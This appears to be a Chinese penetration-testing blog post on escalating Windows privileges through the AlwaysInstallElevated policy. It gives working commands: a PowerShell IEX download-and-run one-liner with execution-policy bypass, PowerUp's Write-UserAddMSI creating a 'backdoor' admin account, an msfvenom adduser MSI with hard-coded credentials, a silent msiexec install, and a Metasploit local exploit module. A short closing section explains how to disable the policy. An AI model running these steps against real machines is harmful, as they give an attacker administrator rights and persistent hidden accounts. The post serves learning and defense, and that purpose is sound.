PowerSploit

PowerSploit是基于PowerShell的后渗透框架包含很多Powershell攻击脚本，它们主要用于渗透中的信息侦察、权限提升、权限维持。
GitHub下载：https://github.com/PowerShellMafia/PowerSpoloit

PowerUp

PowerUp是Privesc模块下的脚本功能强大，多用来寻找目标主机windows服务漏洞进行提权的实用脚本。
此实战中使用了Get-RegistryAlwaysInstallElevated两个模块。
检查注册表的设置，如果注册表设置就意味着MSI可以被管理员权限运行。

powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

添加用户使用Write-UserAddMSI模块，会产生MSI文件。

普通用户权限运行就可以添加账户
backdoor用户成功添加。

查看管理员组是否有我们添加的用户
backdoor已经是管理员组的成员了

msf

使用msf也可以产生同样的效果
使用msfvenmo生成MSI的payload

msfvenom -p windows/adduser USER=clay PASS=0X7779@ss! -f msi > /tmp/add.msi

使用meterpreter将payload上传

msiexec常用参数

• /i 安装或配置产品
• /x卸载产品
• /quiet安静模式，无用户交互
• /q 【n】无用户界面 【b】基本页面【r】精简页面【f】完整页面
• /morestart安装完成后不重新启动

shell下执行

msiexec /i /qn /quiet c:\add.msi

clay用户成功添加

自动化模块

在msf下有自动化模块可以使用

use exploit/windows/local/always_install_elevated

获得了两个会话

防御措施

此漏洞是因为用户开启了Windows Installer特权安装功能。

方法

运行中 gpedit.msc 打开本地组策略编辑器
组策略中–计算机配置–管理模板–windows组件–windows Installer 永远以高特权进行安装：已启用
组策略中–计算机配置–用户配置–windows组件–windows Installer 永远以高特权进行安装：已启用

对照攻击方法进行防御，只要关闭AlwaysInstallElevated可以阻止他人利用MSI文件进行提权。

人生漫漫其修远兮，网安无止境。
一同前行，加油！

PowerSploit PowerUp模块提权相关推荐

1. 118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]

   我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...

2. CobaltStrike使用-第五篇（Bypass UAC、CVE提权、Powerup提权）

   前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录 权限提升 Bypass UAC CVE提权 PowerUp 凭证和哈希获取 Beacon 中的 ...

3. 系统提权之：Windows 提权

   郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

4. Cobalt Strike 提权

   郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...

5. 内网渗透常用提权方式总结

   文章目录 前言 内网提权的常用方法 一.Windows系统内核溢出漏洞提权 1.手动查找系统潜在漏洞 2.使用Windows-Exploit-Suggester 3.使用sherlock 脚本 4.还 ...

6. msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上）

   目录 1.文件交互指令 2.上传下载文件(windows) 3.屏幕截图(windows) 4.键盘记录(windows) 1.先启动记录keyscan_start 2.显示键盘输入内容keyscan ...

7. CVE-2018-8120漏洞复现(提权)

   最好用的提权漏洞CVE-2018-8120 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用 ...

8. metasploit linux 提权

   1.简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的 缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开 ...

9. Meterpreter 提权

   0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...

最新文章

1. python 示列：抓取网页所有a连接
2. SQL点点滴滴_UPDATE小计
3. Win10配置Tensorflow_Object_Detection_API
4. Borg Maze POJ - 3026 (BFS + 最小生成树)
5. 坐标转换-换带计算(附软件下载）
6. npstion实现通过手机扫描二维码向电脑录入信息
7. LiveGBS流媒体平台GB/T28181常见问题-海康大华宇视监控设备安防摄像头等设备注册不上来如何检查问题？
8. 微信公众号首次关注自动回复图文信息
9. 积分变现|积分变现如何效益最大化？信用卡积分如何快速变现？
10. 【学术相关】交大博士学长：研究生计算机专业的方向选择！
11. canvas制作印章
12. Pygame详解（十六）：cursors 模块
13. 大数据营销更需要消费者洞察
14. 深入理解jvm（转）
15. JavaWeb学习心得总结
16. 链全财经成功举办WBO第一届世界区块链高峰论坛
17. EXCEL VBA 对话框MsgBox语法笔记
18. AutoCAD2011免费下载AutoCAD2011安装教程（中文）
19. LGO 软件静态后处理及坐标转换操作流程
20. HTTP请求头X-Forwarded-For，Remote_Addr

热门文章

1. 【乐绘派】Audition专业音频后期制作教程 | 3-工作区
2. Lucene 3.0.0的结构遍历TokenStream的内容
3. toPlainString() 、 toString()
4. 论激情引领探索，探索产生成就感，成就感反馈激情之螺旋上升——大学阶段最酷的体验之软工实践
5. java红包金额随机数算法_实时随机数算法（微信红包分配算法）
6. 不是408，但很像408！双一流东北林业大学计算机考研改考！
7. 如何将照片变漫画效果？分享两个照片变漫画小技巧
8. 深入分析配置静态路由与相关命令
9. SpringBoot整合CRM项目--客户管理（四）
10. 数据库mysql：更新指定部门员工的工资上涨20%